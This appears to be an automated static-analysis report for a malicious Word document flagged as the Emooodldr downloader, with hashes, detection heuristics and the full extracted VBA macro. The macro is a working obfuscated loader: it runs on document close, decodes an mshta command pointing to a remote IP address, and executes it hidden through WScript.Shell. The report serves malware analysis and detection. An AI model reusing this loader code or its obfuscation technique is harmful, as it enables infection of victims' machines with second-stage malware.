Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 f03677848e924269…

MALICIOUS

Office (OOXML)

54.3 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-12-10
MD5: 735eed3bd45110f9bc21dfb3bf3406a8 SHA-1: 296d79ab15c935818b5689d42da022803c8fd045 SHA-256: f03677848e924269e0c8f357ad56e96fb7d0875b6aef434779594e5fbeacb2aa
322 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic firing for an obfuscated auto-exec VBA loader that uses CreateObject and Shell execution. The VBA script attempts to reconstruct a URL, 'http://198.55.107.156/oIoPcquwTUpZAIoPcquwTUpZA/qnMuSHVEzXdYOTyZDTXLFuTVNkTzUFOxBTVXIoPcquwTUpZA.php?uOTyZDTXLFuTVIoPcquwTUpZAJkSfdBfuUEAF=hond', and a command, 'WScript.Shell', which are indicative of a downloader attempting to execute a second-stage payload. ClamAV also detected the file as 'Doc.Malware.Emooodldr-6711604-0'.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2625 bytes
SHA-256: c340ed3609ea63348e4179eff23b5abcb94f4379b4f56ae70002461b17c1aa60
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub leguminoso()
 iAIVVWi = 347 - 1491 - 1540 - 143 - 386 - 292
TWdPXROCbK = 41 + 1595 + 711 + 1286 + 658 + 1099 + 1320 + 1970
MxHpnAPPjRDG = Trim("b") & Trim("z")

 osmotico = "IoPcquwTUpZAqnMuSHVEzXdYhOTyZDTXLFuTVJkSfdBfuUEAF hOTyZDTXLFuTVOTyZDTXLFuTVp://198.55.107.156/oIoPcquwTUpZAIoPcquwTUpZA/qnMuSHVEzXdYOTyZDTXLFuTVNkTzUFOxBTVXIoPcquwTUpZA.php?uOTyZDTXLFuTVIoPcquwTUpZAJkSfdBfuUEAF=hond"
osmotico = Replace(osmotico, "IoPcquwTUpZA", "m")
osmotico = Replace(osmotico, "JkSfdBfuUEAF", "a")
dxFZDFbznnd = 983 - 220 - 1511 - 1941
osmotico = Replace(osmotico, "qnMuSHVEzXdY", "s")
CTUiJIKZ = Trim("P") & "N" & "F" & Trim("k") & Trim("f")
osmotico = Replace(osmotico, "OTyZDTXLFuTV", "t")
osmotico = Replace(osmotico, "NkTzUFOxBTVX", "e")
osmotico = Replace(osmotico, "YWxpjIZqvPcP", "l")

maestro = "WScripBgbAyHVcGXKY.ShddPpkMJIOXiufPMRgGIgVUQLfPMRgGIgVUQL"
maestro = Replace(maestro, "TZyCTQPSqXYE", "m")
ETjdzTpuZG = "Q" & Trim("Q") & Trim("U") & "G" & Trim("b")
ZcokbQB = 194 + 1781 + 82 + 839 + 981
maestro = Replace(maestro, "FJiIIPjNOdZd", "a")
maestro = Replace(maestro, "cUVEIWoOoPvI", "s")
maestro = Replace(maestro, "BgbAyHVcGXKY", "t")
dFRIzrNPGXB = Trim("C") & Trim("F") & "g" & "L"
SQyFLwLn = 1485 - 1100 - 1573 - 1678
maestro = Replace(maestro, "ddPpkMJIOXiu", "e")
UAHUbfRjCiiT = Trim("i") & "B" & "N"
maestro = Replace(maestro, "fPMRgGIgVUQL", "l")
xfUTVSGn = 1652 + 8 + 1808 + 763
JSjLEYzEYoER = 1967 + 1040 + 405
zWBKgkIYBA = Trim("T") & "R" & Trim("x")


 CreateObject(maestro).Run osmotico, 0
 REYMTWwiV = "K" & "o" & Trim("F")
xRXCxcOFSA = Trim("w") & "U" & "f" & "W"
pfGIuDvQ = 700 + 1421 + 1269 + 1050 + 1256 + 1567
UNJVVuR = 1249 - 523
KCfffCYj = "M" & "c" & Trim("W") & Trim("k")

End Sub

Sub AutoClose()

  niDGEwIwc = 1805 + 956 + 1222 + 192 + 386
SErdSdXoAK = 253 + 220 + 209 + 57 + 537 + 860 + 174
ZdizDKqqAvSr = 342 + 765 + 839
EFZoHOcgzJ = "O" & Trim("n") & Trim("d")
WjzUFjfpwo = 1326 + 61 + 1646 + 43
QFvYjDAB = 1318 + 828 + 1528 + 723 + 1406 + 1755

  Application.Run "leguminoso"
  DCrZCONcVI = "M" & Trim("q") & Trim("U")
ncfopYzWqr = 844 + 1771 + 755
AvTUcUgEPMgS = 631 + 1180 + 1680 + 656 + 1068 + 1816 + 1234 + 597 + 1615
oBUzCpLKJd = Trim("E") & "o" & Trim("g") & Trim("T") & Trim("B")
kCuzrXYukwB = "g" & Trim("f") & "T"

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: 30a6bb6fe5578d7a69c2d7c9bab72c81352ba736824e23a659c9e3b64ea66942
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.